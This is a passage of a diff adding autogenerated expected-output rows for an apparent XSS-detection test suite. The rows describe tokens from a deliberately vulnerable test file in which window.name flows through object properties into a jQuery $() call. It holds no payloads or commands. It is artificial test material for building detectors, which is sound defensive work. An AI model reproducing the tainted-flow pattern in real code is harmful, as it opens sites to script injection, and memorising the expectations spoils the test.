element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:293:9:293:16 | obj | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:293:9:293:16 | obj | enclosingFunctionBody | obj obj Math random window name p obj $ p | +| autogenerated/Xss/DomBasedXss/tst.js:293:9:293:16 | obj | enclosingFunctionName | flowThroughPropertyNames | +| autogenerated/Xss/DomBasedXss/tst.js:293:9:293:16 | obj | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:293:9:293:16 | obj = {} | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:293:9:293:16 | obj = {} | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:293:9:293:16 | obj = {} | enclosingFunctionBody | obj obj Math random window name p obj $ p | +| autogenerated/Xss/DomBasedXss/tst.js:293:9:293:16 | obj = {} | enclosingFunctionName | flowThroughPropertyNames | +| autogenerated/Xss/DomBasedXss/tst.js:293:9:293:16 | obj = {} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:293:15:293:16 | {} | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:293:15:293:16 | {} | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:293:15:293:16 | {} | enclosingFunctionBody | obj obj Math random window name p obj $ p | +| autogenerated/Xss/DomBasedXss/tst.js:293:15:293:16 | {} | enclosingFunctionName | flowThroughPropertyNames | +| autogenerated/Xss/DomBasedXss/tst.js:293:15:293:16 | {} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:294:5:294:7 | obj | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:294:5:294:7 | obj | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:294:5:294:7 | obj | enclosingFunctionBody | obj obj Math random window name p obj $ p | +| autogenerated/Xss/DomBasedXss/tst.js:294:5:294:7 | obj | enclosingFunctionName | flowThroughPropertyNames | +| autogenerated/Xss/DomBasedXss/tst.js:294:5:294:7 | obj | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:294:5:294:22 | obj[Math.random()] | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:294:5:294:22 | obj[Math.random()] | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:294:5:294:22 | obj[Math.random()] | enclosingFunctionBody | obj obj Math random window name p obj $ p | +| autogenerated/Xss/DomBasedXss/tst.js:294:5:294:22 | obj[Math.random()] | enclosingFunctionName | flowThroughPropertyNames | +| autogenerated/Xss/DomBasedXss/tst.js:294:5:294:22 | obj[Math.random()] | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:294:5:294:36 | obj[Mat ... ow.name | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:294:5:294:36 | obj[Mat ... ow.name | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:294:5:294:36 | obj[Mat ... ow.name | enclosingFunctionBody | obj obj Math random window name p obj $ p | +| autogenerated/Xss/DomBasedXss/tst.js:294:5:294:36 | obj[Mat ... ow.name | enclosingFunctionName | flowThroughPropertyNames | +| autogenerated/Xss/DomBasedXss/tst.js:294:5:294:36 | obj[Mat ... ow.name | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:294:9:294:12 | Math | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:294:9:294:12 | Math | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:294:9:294:12 | Math | enclosingFunctionBody | obj obj Math random window name p obj $ p | +| autogenerated/Xss/DomBasedXss/tst.js:294:9:294:12 | Math | enclosingFunctionName | flowThroughPropertyNames | +| autogenerated/Xss/DomBasedXss/tst.js:294:9:294:12 | Math | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:294:9:294:19 | Math.random | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:294:9:294:19 | Math.random | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:294:9:294:19 | Math.random | enclosingFunctionBody | obj obj Math random window name p obj $ p | +| autogenerated/Xss/DomBasedXss/tst.js:294:9:294:19 | Math.random | enclosingFunctionName | flowThroughPropertyNames | +| autogenerated/Xss/DomBasedXss/tst.js:294:9:294:19 | Math.random | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:294:9:294:21 | Math.random() | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:294:9:294:21 | Math.random() | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:294:9:294:21 | Math.random() | enclosingFunctionBody | obj obj Math random window name p obj $ p | +| autogenerated/Xss/DomBasedXss/tst.js:294:9:294:21 | Math.random() | enclosingFunctionName | flowThroughPropertyNames | +| autogenerated/Xss/DomBasedXss/tst.js:294:9:294:21 | Math.random() | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:294:9:294:21 | exceptional return of Math.random() | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:294:9:294:21 | exceptional return of Math.random() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:294:9:294:21 | exceptional return of Math.random() | enclosingFunctionBody | obj obj Math random window name p obj $ p | +| autogenerated/Xss/DomBasedXss/tst.js:294:9:294:21 | exceptional return of Math.random() | enclosingFunctionName | flowThroughPropertyNames | +| autogenerated/Xss/DomBasedXss/tst.js:294:9:294:21 | exceptional return of Math.random() | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:294:14:294:19 | random | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:294:14:294:19 | random | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:294:14:294:19 | random | enclosingFunctionBody | obj obj Math random window name p obj $ p | +| autogenerated/Xss/DomBasedXss/tst.js:294:14:294:19 | random | enclosingFunctionName | flowThroughPropertyNames | +| autogenerated/Xss/DomBasedXss/tst.js:294:14:294:19 | random | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:294:26:294:31 | window | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:294:26:294:31 | window | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:294:26:294:31 | window | enclosingFunctionBody | obj obj Math random window name p obj $ p | +| autogenerated/Xss/DomBasedXss/tst.js:294:26:294:31 | window | enclosingFunctionName | flowThroughPropertyNames | +| autogenerated/Xss/DomBasedXss/tst.js:294:26:294:31 | window | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:294:26:294:36 | window.name | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:294:26:294:36 | window.name | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:294:26:294:36 | window.name | enclosingFunctionBody | obj obj Math random window name p obj $ p | +| autogenerated/Xss/DomBasedXss/tst.js:294:26:294:36 | window.name | enclosingFunctionName | flowThroughPropertyNames | +| autogenerated/Xss/DomBasedXss/tst.js:294:26:294:36 | window.name | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:294:33:294:36 | name | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:294:33:294:36 | name | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:294:33:294:36 | name | enclosingFunctionBody | obj obj Math random window name p obj $ p | +| autogenerated/Xss/DomBasedXss/tst.js:294:33:294:36 | name | enclosingFunctionName | flowThroughPropertyNames | +| autogenerated/Xss/DomBasedXss/tst.js:294:33:294:36 | name | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:295:14:295:14 | p | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:295:14:295:14 | p | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:295:14:295:14 | p | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:295:14:295:14 | p | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:295:14:295:14 | p | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:295:14:295:14 | p | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:295:14:295:14 | p | enclosingFunctionBody | obj obj Math random window name p obj $ p | +| autogenerated/Xss/DomBasedXss/tst.js:295:14:295:14 | p | enclosingFunctionBody | obj obj Math random window name p obj $ p | +| autogenerated/Xss/DomBasedXss/tst.js:295:14:295:14 | p | enclosingFunctionBody | obj obj Math random window name p obj $ p | +| autogenerated/Xss/DomBasedXss/tst.js:295:14:295:14 | p | enclosingFunctionName | flowThroughPropertyNames | +| autogenerated/Xss/DomBasedXss/tst.js:295:14:295:14 | p | enclosingFunctionName | flowThroughPropertyNames | +| autogenerated/Xss/DomBasedXss/tst.js:295:14:295:14 | p | enclosingFunctionName | flowThroughPropertyNames | +| autogenerated/Xss/DomBasedXss/tst.js:295:14:295:14 | p | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:295:14:295:14 | p | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:295:14:295:14 | p | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:295:19:295:21 | obj | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:295:19:295:21 | obj | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:295:19:295:21 | obj | enclosingFunctionBody | obj obj Math random window name p obj $ p | +| autogenerated/Xss/DomBasedXss/tst.js:295:19:295:21 | obj | enclosingFunctionName | flowThroughPropertyNames | +| autogenerated/Xss/DomBasedXss/tst.js:295:19:295:21 | obj | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:296:7:296:7 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:296:7:296:7 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:296:7:296:7 | $ | enclosingFunctionBody | obj obj Math random window name p obj $ p | +| autogenerated/Xss/DomBasedXss/tst.js:296:7:296:7 | $ | enclosingFunctionName | flowThroughPropertyNames | +| autogenerated/Xss/DomBasedXss/tst.js:296:7:296:7 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:296:7:296:10 | $(p) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:296:7:296:10 | $(p) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:296:7:296:10 | $(p) | enclosingFunctionBody | obj obj Math random window name p obj $ p | +| autogenerated/Xss/DomBasedXss/tst.js:296:7:296:10 | $(p) | enclosingFunctionName | flowThroughPropertyNames | +| autogenerated/Xss/DomBasedXss/tst.js:296:7:296:10 | $(p) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:296:7:296:10 | exceptional return of $(p) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:296:7:296:10 | exceptional return of $(p) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:296:7:296:10 | exceptional return of $(p) | enclosingFunctionBody | obj obj Math random window name p obj $ p | +| autogenerated/Xss/DomBasedXss/tst.js:296:7:296:10 | exceptional return of $(p) | enclosingFunctionName | flowThroughPropertyNames | +| autogenerated/Xss/DomBasedXss/tst.js:296:7:296:10 | exceptional return of $(p) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:296:9:296:9 | p | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:296:9:296:9 | p | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:296:9:296:9 | p | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17191,6 +119364,77 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:296:9:296:9 | p | enclosingFunctionBody | obj obj Math random window name p obj $ p | | autogenerated/Xss/DomBasedXss/tst.js:296:9:296:9 | p | enclosingFunctionName | flowThroughPropertyNames | | autogenerated/Xss/DomBasedXss/tst.js:296:9:296:9 | p | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:299:1:299:0 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:299:1:299:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:299:1:299:0 | this | enclosingFunctionBody | location e $ body append e location e $ body append e | +| autogenerated/Xss/DomBasedXss/tst.js:299:1:299:0 | this | enclosingFunctionName | basicExceptions | +| autogenerated/Xss/DomBasedXss/tst.js:299:1:299:0 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:299:1:313:1 | 'arguments' object of function basicExceptions | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:299:1:313:1 | 'arguments' object of function basicExceptions | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:299:1:313:1 | 'arguments' object of function basicExceptions | enclosingFunctionBody | location e $ body append e location e $ body append e | +| autogenerated/Xss/DomBasedXss/tst.js:299:1:313:1 | 'arguments' object of function basicExceptions | 